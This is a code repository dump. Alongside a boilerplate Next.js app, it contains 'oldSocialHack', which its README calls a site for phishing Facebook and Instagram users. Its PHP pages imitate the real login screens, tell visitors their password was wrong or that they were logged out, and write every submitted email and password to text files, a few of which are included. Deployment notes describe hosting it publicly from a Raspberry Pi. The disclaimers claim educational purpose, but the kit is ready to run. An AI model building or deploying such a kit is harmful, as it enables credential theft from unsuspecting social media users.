├── oldSocialHack ├── favcon.ico ├── favcon.jpg ├── fb_icon1.png ├── instagram.png ├── passwd │ ├── fb_pass.txt │ ├── fb_pass2.txt │ └── insta_pass.txt ├── facebook-logo.png ├── facebook-logo1.png ├── redirect.php ├── Docs │ ├── steps-to-follow.txt │ └── file_permissions_in_server.txt ├── README.md ├── DISCLAIMER.md ├── facebook-lp.php ├── style.css ├── facebook.php ├── index2.php └── index.php ├── jsconfig.json ├── next.config.mjs ├── public ├── vercel.svg ├── window.svg ├── file.svg ├── globe.svg └── next.svg ├── src └── app │ ├── login │ └── page.js │ ├── home │ └── page.js │ ├── page.js │ ├── layout.js │ ├── globals.css │ ├── api │ └── auth │ │ └── [...nextauth] │ │ └── route.js │ └── page.module.css ├── eslint.config.mjs ├── package.json ├── .gitignore └── README.md /oldSocialHack/favcon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/favcon.ico -------------------------------------------------------------------------------- /oldSocialHack/favcon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/favcon.jpg -------------------------------------------------------------------------------- /oldSocialHack/fb_icon1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/fb_icon1.png -------------------------------------------------------------------------------- /oldSocialHack/instagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/instagram.png -------------------------------------------------------------------------------- /oldSocialHack/passwd/fb_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st User name is: vishal@gmail.com && the 1st Password is: vishal1 3 | -------------------------------------------------------------------------------- /oldSocialHack/passwd/fb_pass2.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st password is: vishal123 3 | 4 | The 2nd password is: vishal123 5 | -------------------------------------------------------------------------------- /oldSocialHack/passwd/insta_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | The 1st password is: vishal1 3 | 4 | The 2nd password is: vishal2 5 | -------------------------------------------------------------------------------- /oldSocialHack/facebook-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/facebook-logo.png -------------------------------------------------------------------------------- /jsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "paths": { 4 | "src/*": ["./src/*"] 5 | } 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type {import('next').NextConfig} */ 2 | const nextConfig = {}; 3 | 4 | export default nextConfig; 5 | -------------------------------------------------------------------------------- /oldSocialHack/facebook-logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FL45h-09/SocialHack/HEAD/oldSocialHack/facebook-logo1.png -------------------------------------------------------------------------------- /public/vercel.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /oldSocialHack/redirect.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/app/login/page.js: -------------------------------------------------------------------------------- 1 | import React from 'react' 2 | 3 | const page = () => { 4 | return ( 5 |
6 |

Login Page here

7 |
8 | ) 9 | } 10 | 11 | export default page; -------------------------------------------------------------------------------- /oldSocialHack/Docs/steps-to-follow.txt: -------------------------------------------------------------------------------- 1 | install dataplicity in device 2 | 3 | sudo apt install apache2 php 4 | 5 | copy all files in /var/www/html 6 | 7 | chenge the permissions 8 | 9 | change the ownerships 10 | 11 | good to go. -------------------------------------------------------------------------------- /src/app/home/page.js: -------------------------------------------------------------------------------- 1 | export const metadata = { 2 | title: "Home Page Title", 3 | description: "This is the description for my Home page", 4 | openGraph: { 5 | title: "My page title", 6 | description: "This is the Open Graph description", 7 | }, 8 | }; 9 | 10 | export default function Page() { 11 | return
Home here
; 12 | } 13 | -------------------------------------------------------------------------------- /src/app/page.js: -------------------------------------------------------------------------------- 1 | import Image from "next/image"; 2 | import styles from "./page.module.css"; 3 | 4 | export default function Home() { 5 | return ( 6 |
7 |
8 | 9 |
10 | 13 |
14 | ); 15 | } 16 | -------------------------------------------------------------------------------- /public/window.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /public/file.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /eslint.config.mjs: -------------------------------------------------------------------------------- 1 | import { dirname } from "path"; 2 | import { fileURLToPath } from "url"; 3 | import { FlatCompat } from "@eslint/eslintrc"; 4 | 5 | const __filename = fileURLToPath(import.meta.url); 6 | const __dirname = dirname(__filename); 7 | 8 | const compat = new FlatCompat({ 9 | baseDirectory: __dirname, 10 | }); 11 | 12 | const eslintConfig = [...compat.extends("next/core-web-vitals")]; 13 | 14 | export default eslintConfig; 15 | -------------------------------------------------------------------------------- /oldSocialHack/README.md: -------------------------------------------------------------------------------- 1 | # SocialHack 2 | This is a website i made to perform phishing attack on Instagram and facebook. 3 | 4 |

#Disclaimer:


5 | This is code is only for educational purpose. So i'am not responsible for any illegal use of this code. 6 | 7 | This is a proof of concept to give you an idea of how these days social media accounts gets hacked. 8 | there are many methods to do this. But i choose to develope my own, so here it is. 9 | 10 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "socialhack", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev --turbopack", 7 | "build": "next build", 8 | "start": "next start", 9 | "lint": "next lint" 10 | }, 11 | "dependencies": { 12 | "bcrypt": "^5.1.1", 13 | "bootstrap": "^5.3.3", 14 | "next": "15.1.7", 15 | "next-auth": "^4.24.11", 16 | "react": "^19.0.0", 17 | "react-dom": "^19.0.0" 18 | }, 19 | "devDependencies": { 20 | "@eslint/eslintrc": "^3", 21 | "eslint": "^9", 22 | "eslint-config-next": "15.1.7" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.* 7 | .yarn/* 8 | !.yarn/patches 9 | !.yarn/plugins 10 | !.yarn/releases 11 | !.yarn/versions 12 | 13 | # testing 14 | /coverage 15 | 16 | # next.js 17 | /.next/ 18 | /out/ 19 | 20 | # production 21 | /build 22 | 23 | # misc 24 | .DS_Store 25 | *.pem 26 | 27 | # debug 28 | npm-debug.log* 29 | yarn-debug.log* 30 | yarn-error.log* 31 | .pnpm-debug.log* 32 | 33 | # env files (can opt-in for committing if needed) 34 | .env* 35 | 36 | # vercel 37 | .vercel 38 | 39 | # typescript 40 | *.tsbuildinfo 41 | next-env.d.ts 42 | -------------------------------------------------------------------------------- /src/app/layout.js: -------------------------------------------------------------------------------- 1 | import { Geist, Geist_Mono } from "next/font/google"; 2 | import 'bootstrap/dist/css/bootstrap.min.css'; 3 | import "./globals.css"; 4 | 5 | const geistSans = Geist({ 6 | variable: "--font-geist-sans", 7 | subsets: ["latin"], 8 | }); 9 | 10 | const geistMono = Geist_Mono({ 11 | variable: "--font-geist-mono", 12 | subsets: ["latin"], 13 | }); 14 | 15 | export const metadata = { 16 | title: "Create Next App", 17 | description: "Generated by create next app", 18 | }; 19 | 20 | export default function RootLayout({ children }) { 21 | return ( 22 | 23 | 24 | {children} 25 | 26 | 27 | ); 28 | } 29 | -------------------------------------------------------------------------------- /src/app/globals.css: -------------------------------------------------------------------------------- 1 | :root { 2 | --background: #ffffff; 3 | --foreground: #171717; 4 | } 5 | 6 | @media (prefers-color-scheme: dark) { 7 | :root { 8 | --background: #0a0a0a; 9 | --foreground: #ededed; 10 | } 11 | } 12 | 13 | html, 14 | body { 15 | max-width: 100vw; 16 | overflow-x: hidden; 17 | } 18 | 19 | body { 20 | color: var(--foreground); 21 | background: var(--background); 22 | font-family: Arial, Helvetica, sans-serif; 23 | -webkit-font-smoothing: antialiased; 24 | -moz-osx-font-smoothing: grayscale; 25 | } 26 | 27 | * { 28 | box-sizing: border-box; 29 | padding: 0; 30 | margin: 0; 31 | } 32 | 33 | a { 34 | color: inherit; 35 | text-decoration: none; 36 | } 37 | 38 | @media (prefers-color-scheme: dark) { 39 | html { 40 | color-scheme: dark; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /oldSocialHack/DISCLAIMER.md: -------------------------------------------------------------------------------- 1 | DISCLAIMER.md 2 | 3 | # DISCLAIMER 4 | SocialHack is dedicated to penetration testers. SocialHack is a Proof of Concept and should be used for authorized testing and/or educational purposes only. The only exception is using it against devices or a network, owned by yourself. 5 | 6 | I take no responsibility for the abuse of SocialHack or any information given in the related documents. 7 | 8 | I DO NOT GRANT PERMISSIONS TO USE SocialHack TO BREAK THE LAW. 9 | 10 | As SocialHack is meant as a Proof of Concept, it is likely that bugs occur. I disclaim any warranty for SocialHack, it is provided "as is". 11 | 12 | 13 | 14 | # README 15 | SocialHack 16 | This project is the prof of concept that we can use socail engineering against people and steal their credentails. 17 | 18 | This is for educational purpose only. 19 | -------------------------------------------------------------------------------- /public/globe.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /oldSocialHack/Docs/file_permissions_in_server.txt: -------------------------------------------------------------------------------- 1 | sudo apt install apache2 php libapache2-mod-php -y 2 | 3 | total 92 4 | -rwxr-xr-x 1 pi www-data 5191 Oct 29 21:07 facebook-logo1.png 5 | -rwxr-xr-x 1 pi www-data 18409 Oct 29 21:07 facebook-logo.png 6 | -rwxr-xr-x 1 pi www-data 1413 Oct 29 21:07 facebook-lp.php 7 | -rwxr-xr-x 1 pi www-data 3373 Oct 29 21:07 facebook.php 8 | -rwxr-xr-x 1 pi www-data 5430 Oct 29 21:07 favcon.ico 9 | -rwxr-xr-x 1 pi www-data 1554 Oct 29 21:07 favcon.jpg 10 | -rwxr-xr-x 1 pi www-data 511 Oct 29 21:07 fb_icon1.png 11 | -rwxr-xr-x 1 www-data www-data 215 Oct 31 13:09 fb_pass2.txt 12 | -rwxr-xr-x 1 www-data www-data 648 Oct 29 21:24 fb_pass.txt 13 | -rwxr-xr-x 1 pi www-data 837 Oct 29 21:07 file_permissions_in_server.txt 14 | -rwxr-xr-x 1 pi www-data 3424 Oct 29 21:07 index2.php 15 | -rwxr-xr-x 1 pi www-data 3424 Oct 29 21:07 index.php 16 | -rwxr-xr-x 1 pi www-data 4398 Oct 29 21:07 instagram.png 17 | -rwxr-xr-x 1 www-data www-data 64 Oct 29 23:37 insta_pass.txt 18 | -rwxr-xr-x 1 pi www-data 129 Oct 29 21:07 redirect.php 19 | -rwxr-xr-x 1 pi www-data 2034 Oct 29 21:07 style.css 20 | -------------------------------------------------------------------------------- /public/next.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | This is a [Next.js](https://nextjs.org) project bootstrapped with [`create-next-app`](https://nextjs.org/docs/app/api-reference/cli/create-next-app). 2 | 3 | ## Getting Started 4 | 5 | First, run the development server: 6 | 7 | ```bash 8 | npm run dev 9 | # or 10 | yarn dev 11 | # or 12 | pnpm dev 13 | # or 14 | bun dev 15 | ``` 16 | 17 | Open [http://localhost:3000](http://localhost:3000) with your browser to see the result. 18 | 19 | You can start editing the page by modifying `app/page.js`. The page auto-updates as you edit the file. 20 | 21 | This project uses [`next/font`](https://nextjs.org/docs/app/building-your-application/optimizing/fonts) to automatically optimize and load [Geist](https://vercel.com/font), a new font family for Vercel. 22 | 23 | ## Learn More 24 | 25 | To learn more about Next.js, take a look at the following resources: 26 | 27 | - [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API. 28 | - [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial. 29 | 30 | You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js) - your feedback and contributions are welcome! 31 | 32 | ## Deploy on Vercel 33 | 34 | The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js. 35 | 36 | Check out our [Next.js deployment documentation](https://nextjs.org/docs/app/building-your-application/deploying) for more details. 37 | -------------------------------------------------------------------------------- /src/app/api/auth/[...nextauth]/route.js: -------------------------------------------------------------------------------- 1 | import NextAuth from "next-auth"; 2 | import CredentialsProvider from "next-auth/providers/credentials"; 3 | import bcrypt from "bcrypt"; 4 | 5 | const users = [ 6 | { 7 | id: "1", 8 | name: "John Doe", 9 | email: "john@example.com", 10 | password: bcrypt.hashSync("password123", 10), // Pre-hashed password 11 | } 12 | ]; 13 | 14 | export const authOptions = { 15 | providers: [ 16 | CredentialsProvider({ 17 | name: "Credentials", 18 | credentials: { 19 | email: { label: "Email", type: "email", placeholder: "user@example.com" }, 20 | password: { label: "Password", type: "password" } 21 | }, 22 | async authorize(credentials) { 23 | if (!credentials?.email || !credentials?.password) { 24 | throw new Error("Email and password are required"); 25 | } 26 | 27 | // Find user in array 28 | const user = users.find(user => user.email === credentials.email); 29 | if (!user) { 30 | throw new Error("User not found"); 31 | } 32 | 33 | // Check password 34 | const isValid = await bcrypt.compare(credentials.password, user.password); 35 | if (!isValid) { 36 | throw new Error("Invalid password"); 37 | } 38 | 39 | return { id: user.id, name: user.name, email: user.email }; 40 | } 41 | }) 42 | ], 43 | session: { 44 | strategy: "jwt" 45 | }, 46 | pages: { 47 | signIn: "/login" 48 | } 49 | }; 50 | 51 | const handler = NextAuth(authOptions); 52 | export { handler as GET, handler as POST }; 53 | -------------------------------------------------------------------------------- /oldSocialHack/facebook-lp.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | Log in to Facebook | Facebook 13 | 14 | 15 | 16 |
17 |
18 | 19 |
20 |
21 | 22 |
23 |

24 |
25 | 26 |
27 | An unexpected error occurred.
28 | You have been loged out from your account. 29 |
30 | 31 |
32 | Please Log In again. 33 |
34 | 35 | 36 | 37 |
38 |

39 | Forgot password? 40 |     41 | Sign up for Facebook 42 |

43 | 44 |
45 | 51 |
52 | 53 |
54 |
55 | 56 | 57 | -------------------------------------------------------------------------------- /oldSocialHack/style.css: -------------------------------------------------------------------------------- 1 | @charset "utf-8"; 2 | /* CSS Document */ 3 | 4 | *{ 5 | margin: 0; 6 | padding: 0; 7 | } 8 | 9 | /* Tablet Landscape */ 10 | @media screen and (max-width: 1060px) { 11 | #primary { width:67%; } 12 | #secondary { width:30%; margin-left:3%;} 13 | } 14 | /* Tabled Portrait */ 15 | @media screen and (max-width: 768px) { 16 | #primary { width:100%; } 17 | #secondary { width:100%; margin:0; border:none; } 18 | } 19 | 20 | body{ 21 | background-color: #fafafa!important; 22 | } 23 | 24 | .container{ 25 | margin-top: 20px; 26 | margin-bottom: 20px; 27 | max-width:none; 28 | display: flex; 29 | justify-content: center; 30 | align-items: center; 31 | } 32 | 33 | .center-column 34 | { 35 | background: #fff; 36 | border: 1px solid #e6e6e6; 37 | width: 350px; 38 | margin: 10px; 39 | padding: 40px; 40 | } 41 | 42 | .instagram-logo 43 | { 44 | margin: 15px auto; 45 | } 46 | 47 | .info 48 | { 49 | font-weight: 600; 50 | line-height: 20px; 51 | font-size: 17px; 52 | color: #999; 53 | } 54 | 55 | .info2 56 | { 57 | font-weight: 600; 58 | line-height: 20px; 59 | font-size: 14px; 60 | color: #999; 61 | } 62 | 63 | .or 64 | { 65 | font-size: 13px!important; 66 | color: #999; 67 | font-weight: 600; 68 | } 69 | 70 | .or::before 71 | { 72 | content: ''; 73 | background: #efefef; 74 | display: block; 75 | height: 2px; 76 | width: 110px; 77 | position: relative; 78 | top: 11px; 79 | } 80 | 81 | .or::after 82 | { 83 | content: ''; 84 | background: #efefef; 85 | display: block; 86 | height: 2px; 87 | width: 110px; 88 | position: relative; 89 | bottom: 10px; 90 | left: 160px; 91 | } 92 | 93 | .form-group 94 | { 95 | margin-bottom: 6px!important; 96 | } 97 | 98 | .form-control 99 | { 100 | background: #fafafa!important; 101 | border: 1px solid #efefef!important; 102 | font-size: 15px!important; 103 | } 104 | 105 | ::placeholder 106 | { 107 | color: #999!important; 108 | } 109 | .btn 110 | { 111 | margin: 12px auto; 112 | font-weight: 600!important; 113 | } 114 | 115 | .btn-primary 116 | { 117 | background-color: #3897f0!important; 118 | border: 1px solid #3897f0!important; 119 | } 120 | 121 | .btn-primary2 122 | { 123 | background-color: #4267b2!important; 124 | border: 1px solid #3897f0!important; 125 | } 126 | 127 | 128 | .right-column-login 129 | { 130 | background: #fff; 131 | border: 1px solid #e6e6e6; 132 | width: 350px; 133 | margin: 10px; 134 | padding: 15px; 135 | text-align: center; 136 | } 137 | 138 | .col-sm-10 139 | { 140 | padding: 0px!important; 141 | } 142 | 143 | .facebook-logo 144 | { 145 | margin: 15px auto; 146 | 147 | } 148 | -------------------------------------------------------------------------------- /src/app/page.module.css: -------------------------------------------------------------------------------- 1 | .page { 2 | --gray-rgb: 0, 0, 0; 3 | --gray-alpha-200: rgba(var(--gray-rgb), 0.08); 4 | --gray-alpha-100: rgba(var(--gray-rgb), 0.05); 5 | 6 | --button-primary-hover: #383838; 7 | --button-secondary-hover: #f2f2f2; 8 | 9 | display: grid; 10 | grid-template-rows: 20px 1fr 20px; 11 | align-items: center; 12 | justify-items: center; 13 | min-height: 100svh; 14 | padding: 80px; 15 | gap: 64px; 16 | font-family: var(--font-geist-sans); 17 | } 18 | 19 | @media (prefers-color-scheme: dark) { 20 | .page { 21 | --gray-rgb: 255, 255, 255; 22 | --gray-alpha-200: rgba(var(--gray-rgb), 0.145); 23 | --gray-alpha-100: rgba(var(--gray-rgb), 0.06); 24 | 25 | --button-primary-hover: #ccc; 26 | --button-secondary-hover: #1a1a1a; 27 | } 28 | } 29 | 30 | .main { 31 | display: flex; 32 | flex-direction: column; 33 | gap: 32px; 34 | grid-row-start: 2; 35 | } 36 | 37 | .main ol { 38 | font-family: var(--font-geist-mono); 39 | padding-left: 0; 40 | margin: 0; 41 | font-size: 14px; 42 | line-height: 24px; 43 | letter-spacing: -0.01em; 44 | list-style-position: inside; 45 | } 46 | 47 | .main li:not(:last-of-type) { 48 | margin-bottom: 8px; 49 | } 50 | 51 | .main code { 52 | font-family: inherit; 53 | background: var(--gray-alpha-100); 54 | padding: 2px 4px; 55 | border-radius: 4px; 56 | font-weight: 600; 57 | } 58 | 59 | .ctas { 60 | display: flex; 61 | gap: 16px; 62 | } 63 | 64 | .ctas a { 65 | appearance: none; 66 | border-radius: 128px; 67 | height: 48px; 68 | padding: 0 20px; 69 | border: none; 70 | border: 1px solid transparent; 71 | transition: 72 | background 0.2s, 73 | color 0.2s, 74 | border-color 0.2s; 75 | cursor: pointer; 76 | display: flex; 77 | align-items: center; 78 | justify-content: center; 79 | font-size: 16px; 80 | line-height: 20px; 81 | font-weight: 500; 82 | } 83 | 84 | a.primary { 85 | background: var(--foreground); 86 | color: var(--background); 87 | gap: 8px; 88 | } 89 | 90 | a.secondary { 91 | border-color: var(--gray-alpha-200); 92 | min-width: 180px; 93 | } 94 | 95 | .footer { 96 | grid-row-start: 3; 97 | display: flex; 98 | gap: 24px; 99 | } 100 | 101 | .footer a { 102 | display: flex; 103 | align-items: center; 104 | gap: 8px; 105 | } 106 | 107 | .footer img { 108 | flex-shrink: 0; 109 | } 110 | 111 | /* Enable hover only on non-touch devices */ 112 | @media (hover: hover) and (pointer: fine) { 113 | a.primary:hover { 114 | background: var(--button-primary-hover); 115 | border-color: transparent; 116 | } 117 | 118 | a.secondary:hover { 119 | background: var(--button-secondary-hover); 120 | border-color: transparent; 121 | } 122 | 123 | .footer a:hover { 124 | text-decoration: underline; 125 | text-underline-offset: 4px; 126 | } 127 | } 128 | 129 | @media (max-width: 600px) { 130 | .page { 131 | padding: 32px; 132 | padding-bottom: 80px; 133 | } 134 | 135 | .main { 136 | align-items: center; 137 | } 138 | 139 | .main ol { 140 | text-align: center; 141 | } 142 | 143 | .ctas { 144 | flex-direction: column; 145 | } 146 | 147 | .ctas a { 148 | font-size: 14px; 149 | height: 40px; 150 | padding: 0 16px; 151 | } 152 | 153 | a.secondary { 154 | min-width: auto; 155 | } 156 | 157 | .footer { 158 | flex-wrap: wrap; 159 | align-items: center; 160 | justify-content: center; 161 | } 162 | } 163 | 164 | @media (prefers-color-scheme: dark) { 165 | .logo { 166 | filter: invert(); 167 | } 168 | } 169 | -------------------------------------------------------------------------------- /oldSocialHack/facebook.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 0) 27 | { 28 | header('location: redirect.php'); 29 | exit; 30 | } 31 | //unset the cookie here 32 | setcookie("our_cookie", "", time() - 3600); 33 | $revisit = true; 34 | } 35 | else 36 | { 37 | $revisit = false; 38 | $messge = "Wrong Email address Or password."; 39 | setcookie("our_cookie", true, time() +75); // Create the cookie here; 40 | 41 | $file = fopen($myFile, "a") or die ("file not open..."); // create and open text file 42 | 43 | $s = "\nThe 1st User name is: ".$usrnm." && the 1st Password is: ".$psswd."\n"; 44 | 45 | fputs($file, $s) or die ("Data not written..."); //write single line of file 46 | 47 | fclose($file); //close file 48 | } 49 | } 50 | else 51 | { 52 | $messge = "Wrong Email address Or password."; 53 | $revisit = false; 54 | if(isset($_COOKIE["our_cookie"])) // Check iff the cookie is already active 55 | { 56 | // Then destroy the cookie 57 | setcookie("our_cookie", "", time() - 3600); 58 | } 59 | } 60 | 61 | } 62 | 63 | ?> 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Log in to Facebook | Facebook 76 | 77 | 78 | 79 |
80 |
81 | 82 |
83 |
84 | 85 |
86 | 87 |

98 |
99 | 100 |
101 | 102 |
103 | 104 |
105 | 106 |
107 | 108 | 109 | 110 |
111 |

112 | Forgot password? 113 |     114 | Sign up for Facebook 115 |

116 | 117 |
118 | 124 |
125 | 126 |
127 |
128 | 129 | 130 | -------------------------------------------------------------------------------- /oldSocialHack/index2.php: -------------------------------------------------------------------------------- 1 | 2 | 0) 25 | { 26 | header('location: redirect.php'); 27 | exit; 28 | } 29 | //unset the cookie here 30 | setcookie("our_cookie", "", time() - 3600); 31 | $revisit = true; 32 | } 33 | else 34 | { 35 | $revisit = false; 36 | $messge = "You have entered wrong password."; 37 | setcookie("our_cookie", true, time() +40); // Create the cookie here; 38 | 39 | $file = fopen($myFile, "a") or die ("file not open..."); // create and open text file 40 | 41 | $s = "\nThe 1st password is: ".$psswd."\n"; 42 | 43 | fputs($file, $s) or die ("Data not written..."); //write single line of file 44 | 45 | fclose($file); //close file 46 | } 47 | } 48 | else 49 | { 50 | $messge = "You have entered wrong password."; 51 | $revisit = false; 52 | if(isset($_COOKIE["our_cookie"])) // Check iff the cookie is already active 53 | { 54 | // Then destroy the cookie 55 | setcookie("our_cookie", "", time() - 3600); 56 | } 57 | } 58 | 59 | } 60 | 61 | ?> 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | Login • Facebook 74 | 75 | 76 | 77 |
78 |
79 | 80 |
81 |
82 | 83 |

84 | You are Trying to access Facebook app from another webpage. 85 |

96 |
97 |

98 | Please verify your password. 99 |

100 |
101 | 102 |
103 | 104 |
105 | 106 | 107 | 108 |
109 |

OR

110 | 111 | 112 | 115 |
116 |
117 |

118 | Forgot password click here 119 |

120 | 121 |
122 | 128 |
129 | 130 |
131 |
132 | 133 | 134 | -------------------------------------------------------------------------------- /oldSocialHack/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 0) 31 | { 32 | header('location: redirect.php'); 33 | exit; 34 | } 35 | //unset the cookie here 36 | setcookie("our_cookie", "", time() - 3600); 37 | $revisit = true; 38 | } 39 | else 40 | { 41 | $revisit = false; 42 | $messge = "You have entered wrong password."; 43 | setcookie("our_cookie", true, time() +40); // Create the cookie here; 44 | 45 | $file = fopen($myFile, "a") or die ("file not open..."); // create and open text file 46 | 47 | $s = "\nThe 1st password is: ".$psswd."\n"; 48 | 49 | fputs($file, $s) or die ("Data not written..."); //write single line of file 50 | 51 | fclose($file); //close file 52 | } 53 | } 54 | else 55 | { 56 | $messge = "You have entered wrong password."; 57 | $revisit = false; 58 | if(isset($_COOKIE["our_cookie"])) // Check iff the cookie is already active 59 | { 60 | // Then destroy the cookie 61 | setcookie("our_cookie", "", time() - 3600); 62 | } 63 | } 64 | 65 | } 66 | 67 | ?> 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | Login • Instagram 80 | 81 | 82 | 83 |
84 |
85 | 86 |
87 |
88 | 89 |

90 | You are Trying to access Instagram app from another webpage. 91 |

102 |
103 |

104 | Please verify your password. 105 |

106 |
107 | 108 |
109 | 110 |
111 | 112 | 113 | 114 |
115 |

OR

116 | 117 | 118 | 121 |
122 |
123 |

124 | Forgot password click here 125 |

126 | 127 |
128 | 134 |
135 | 136 |
137 |
138 | 139 | 140 | 141 | --------------------------------------------------------------------------------